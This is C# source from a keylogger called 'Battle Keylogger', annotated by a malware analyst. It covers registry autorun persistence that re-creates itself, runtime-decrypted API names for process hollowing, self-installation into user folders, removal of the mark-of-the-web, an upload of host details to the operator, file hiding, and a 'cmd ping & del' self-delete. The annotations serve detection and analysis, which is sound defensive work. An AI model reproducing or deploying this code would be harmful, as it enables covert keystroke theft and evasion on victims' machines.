        /// <summary>
        /// Analyst note: thread entry point that writes the path of the installed copy
        /// into a registry value under a key whose path is only decrypted at run time
        /// (with Config.MUTEX as the key), so the path is not visible as a plain string
        /// in the binary. The "[REGISTRYPATH]" placeholder presumably resolves to an
        /// autorun location — confirm by decrypting it.
        /// </summary>
        /// <param name="args">Thread-start argument; its string form is the path of
        /// the dropped executable.</param>
        private static void Startup(object args)
        {
            string installPath = args.ToString();

            // When REGISTRY_PERSISTENCE is non-empty this loop never exits and has no
            // delay: the value is rewritten continuously, which re-creates the entry if
            // a user or tool removes it. A process repeatedly setting the same registry
            // value is a useful behavioural detection signal for this sample.
            do
            {
                try
                {
                    if (!string.IsNullOrEmpty(Config.HKCU))
                    {
                        // Per-user hive (no elevation needed). OpenSubKey returns null when
                        // the key is absent; the resulting NullReferenceException is swallowed.
                        Registry.CurrentUser.OpenSubKey(StringCipher.Decrypt("[REGISTRYPATH]", Config.MUTEX), true).SetValue(Config.HKCU, installPath);
                    }
                }
                catch { } // every failure is ignored, including access denied
                try
                {
                    if (!string.IsNullOrEmpty(Config.HKLM))
                    {
                        // Machine-wide hive; without elevation the write throws and is
                        // silently ignored by the catch below.
                        Registry.LocalMachine.OpenSubKey(StringCipher.Decrypt("[REGISTRYPATH]", Config.MUTEX), true).SetValue(Config.HKLM, installPath);
                    }
                }
                catch { }
            }while (!string.IsNullOrEmpty(Config.REGISTRY_PERSISTENCE));
        }
 /// <summary>
 /// Analyst note: resolves a set of Win32/NT API delegates at run time. Each export
 /// name is stored encrypted and decrypted with Config.MUTEX immediately before
 /// resolution, so none of these names appears in the import table or as a plain
 /// string in the binary. The combination resolved here (VirtualAllocEx,
 /// WriteProcessMemory, Get/SetThreadContext including the Wow64 variants,
 /// NtUnmapViewOfSection, ResumeThread) is characteristic of process hollowing;
 /// confirm against the code that consumes these delegates, which is not in this
 /// listing. Core.CreateAPI presumably wraps LoadLibrary/GetProcAddress — verify.
 /// </summary>
 public static void Initialize()
 {
     // CreateProcess resolution is commented out here; the caller must obtain it elsewhere.
     //DynamicCreateProcess = Core.CreateAPI<CreateProcess>(Core.KERNEL32, StringCipher.Decrypt("[CreateProcessW]", Config.MUTEX));
     DynamicGetThreadContext      = Core.CreateAPI <GetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[GetThreadContext]", Config.MUTEX));
     // Only this one is taken from ntdll; the rest come from Core.KERNEL32.
     DynamicNtUnmapViewOfSection  = Core.CreateAPI <NtUnmapViewOfSection>("ntdll", StringCipher.Decrypt("[NtUnmapViewOfSection]", Config.MUTEX));
     DynamicReadProcessMemory     = Core.CreateAPI <ReadProcessMemory>(Core.KERNEL32, StringCipher.Decrypt("[ReadProcessMemory]", Config.MUTEX));
     DynamicResumeThread          = Core.CreateAPI <ResumeThread>(Core.KERNEL32, StringCipher.Decrypt("[ResumeThread]", Config.MUTEX));
     DynamicSetThreadContext      = Core.CreateAPI <SetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[SetThreadContext]", Config.MUTEX));
     DynamicVirtualAllocEx        = Core.CreateAPI <VirtualAllocEx>(Core.KERNEL32, StringCipher.Decrypt("[VirtualAllocEx]", Config.MUTEX));
     // Wow64 variants allow the same logic to target a 32-bit process from a 64-bit one.
     DynamicWow64GetThreadContext = Core.CreateAPI <Wow64GetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[Wow64GetThreadContext]", Config.MUTEX));
     DynamicWow64SetThreadContext = Core.CreateAPI <Wow64SetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[Wow64SetThreadContext]", Config.MUTEX));
     DynamicWriteProcessMemory    = Core.CreateAPI <WriteProcessMemory>(Core.KERNEL32, StringCipher.Decrypt("[WriteProcessMemory]", Config.MUTEX));
 }
        /// <summary>
        /// Analyst note: installation routine of the keylogger. It copies the running
        /// executable into a configurable user-writable folder, strips what is presumably
        /// the mark-of-the-web stream, reports the installation to the operator together
        /// with host information, optionally hides the copy and deletes the original,
        /// then launches the copy and exits. Every step is wrapped in an empty catch, so
        /// partial installs are silent. Observable indicators: a self-copy into
        /// AppData/LocalAppData/Documents/Temp, a "cmd /c ping ... &amp; del" child
        /// process, and an outbound upload right after the copy.
        /// </summary>
        public static void Install()
        {
            try
            {
                string runningPath = Application.ExecutablePath;
                // Already running from the install location: nothing to do.
                if (runningPath.Equals(GetInstallPath()))
                {
                    return;
                }
                // PATH_TYPE selects the base folder. Any value other than "1".."4" leaves
                // installPath empty, so the path below becomes "\<FOLDER_NAME>" on the
                // current drive root.
                string installPath = string.Empty;
                if (Config.PATH_TYPE.Equals("1"))
                {
                    installPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
                }
                else if (Config.PATH_TYPE.Equals("2"))
                {
                    installPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
                }
                else if (Config.PATH_TYPE.Equals("3"))
                {
                    installPath = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
                }
                else if (Config.PATH_TYPE.Equals("4"))
                {
                    // GetTempPath ends with a separator; drop it so "\\" is not doubled below.
                    installPath = Path.GetTempPath().Substring(0, Path.GetTempPath().Length - 1);
                }
                installPath += "\\" + Config.FOLDER_NAME;
                if (!Directory.Exists(installPath))
                {
                    try
                    {
                        Directory.CreateDirectory(installPath);
                    }
                    catch { }
                }
                installPath += "\\" + Config.FILE_NAME;

                try
                {
                    File.Copy(runningPath, installPath, true); //Drops file
                }
                catch { }
                try
                {
                    // "[ZONEID]" is decrypted at run time and appended to the dropped path;
                    // given the name it is presumably the ":Zone.Identifier" alternate data
                    // stream, i.e. this removes the mark-of-the-web from the copy — confirm
                    // by decrypting. DeleteFile is resolved by name rather than P/Invoked.
                    Core.CallAPI <bool>("kernel32", "DeleteFile", new Type[] { typeof(string) }, installPath + StringCipher.Decrypt("[ZONEID]", Config.MUTEX));
                }
                catch { }

                // Check-in to the operator: sends host details from ComputerInformation
                // (contents not visible here). The meaning of the "4" argument is not
                // visible in this listing. Not wrapped in a try, so an upload failure
                // aborts the rest of the install via the outer catch.
                Core.Upload("Battle Keylogger Installation Notification", "Battle Keylogger has been installed with the Galaxy Logger Installation Module" + Environment.NewLine + ComputerInformation.GetInformation(), "4");

                if (!string.IsNullOrEmpty(Config.HIDE_FILE))
                {
                    try
                    {
                        // File.SetAttributes replaces the attribute set, so the second
                        // call overwrites the first: the copy ends up System-only, not
                        // Hidden|System.
                        File.SetAttributes(installPath, FileAttributes.Hidden);
                        File.SetAttributes(installPath, FileAttributes.System);
                    }
                    catch { }
                }

                if (!string.IsNullOrEmpty(Config.MELT_FILE))
                {
                    try
                    {
                        // "Melt": a hidden cmd waits ~2 s via ping, then deletes the
                        // original executable once this process has exited. This exact
                        // command line is a strong process-creation detection signal.
                        ProcessStartInfo info = new ProcessStartInfo();
                        info.CreateNoWindow  = true;
                        info.UseShellExecute = false;
                        info.FileName        = "cmd";
                        info.Arguments       = "/c ping -n 3 127.0.0.1 > nul & del " + '"' + runningPath + '"';
                        Process.Start(info);
                    }
                    catch { }
                }
                // Hand over to the dropped copy and terminate this instance.
                Process.Start(installPath);
                //GC.Collect();
                Environment.Exit(0);
            }
            catch (Exception ex) { Config.DumpErrorLog(ex, null); }
        }